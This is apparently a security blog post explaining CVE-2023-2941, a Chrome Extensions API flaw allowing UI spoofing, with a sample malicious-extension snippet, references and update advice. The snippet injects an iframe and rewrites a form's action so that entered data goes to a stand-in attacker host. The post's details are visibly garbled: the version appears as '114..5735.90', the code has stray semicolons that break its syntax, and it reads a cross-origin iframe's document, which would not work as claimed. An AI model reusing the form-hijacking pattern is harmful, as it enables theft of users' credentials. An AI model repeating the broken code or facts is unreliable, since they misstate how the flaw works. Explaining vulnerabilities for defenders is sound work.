CVE-2023-2941 - Spoofing UI Contents Through Malicious Chrome Extension (Severity: Low)

A recent vulnerability in Google Chrome has been identified and assigned CVE-2023-2941. This issue affects the Extensions API in Google Chrome versions prior to 114..5735.90. It allows a bad actor to spoof the contents of the user interface (UI) by convincing users to install a malicious Chrome extension. With this post, we'll break down the vulnerability details, a code snippet demonstrating the issue, and provide you with links to original references and the official Chromium documentation.

Vulnerability Details

This vulnerability lies in the inappropriate implementation of the Extensions API. It enables attackers to send users specifically crafted Chrome extensions and, if users install these extensions, attackers can take control of the UI contents displayed in the browser.

The security severity of this vulnerability is classified as “Low” as per Chromium. However, this does not mean it should be underestimated. Not addressing this issue may allow nefarious actions on affected Chrome browsers. It is important to note that this security issue does not affect the latest version of Google Chrome. Therefore, it is crucial to keep your browser updated to the latest version.

Sample Code Snippet

Here is an example of how an attacker can exploit this vulnerability through a crafted Chrome extension:

chrome.tabs.create({"url": "https://malicious.example.com";}, function(targetTab) {
  chrome.tabs.executeScript(targetTab.id, {"code": `
    var iframe = document.createElement("iframe");
    iframe.src = "https://trusted.example.com/secure_page";;
    document.body.appendChild(iframe);

    iframe.onload = function() {
      var innerDoc = iframe.contentDocument || iframe.contentWindow.document;
      var secureForm = innerDoc.getElementById("secureForm");

      secureForm.action = "https://malicious.example.com/capture_data";;
    };
  `});
});

This code snippet creates a new tab that loads a malicious website. It then proceeds to execute the scripted code that shows an iframe containing trusted content, such as an embedded form from trusted.example.com. However, when the form is submitted, the action property is changed to forward sensitive data entered by the user to the attacker's malicious website.

For further information about this vulnerability, you can refer to the following sources

1. The official Chromium Bug Tracker: https://crbug.com/1246042
2. The National Vulnerability Database (NVD) entry: https://nvd.nist.gov/vuln/detail/CVE-2023-2941

Recommended Action

To protect yourself from this vulnerability, you must update the Google Chrome browser to the latest version, which is 114..5735.90 or newer, as the issue has been resolved in this version.

Conclusion

In conclusion, despite the low severity classification from the Chromium team, it is important to take CVE-2023-2941 into consideration. Keeping Google Chrome and other software updated is always essential to prevent attackers from exploiting known vulnerabilities. As a best practice, make it a habit to install updates as they become available, and regularly verify that you are utilizing the latest version on all your devices.

Timeline

Published on: 05/30/2023 22:15:00 UTC
Last modified on: 06/02/2023 03:12:00 UTC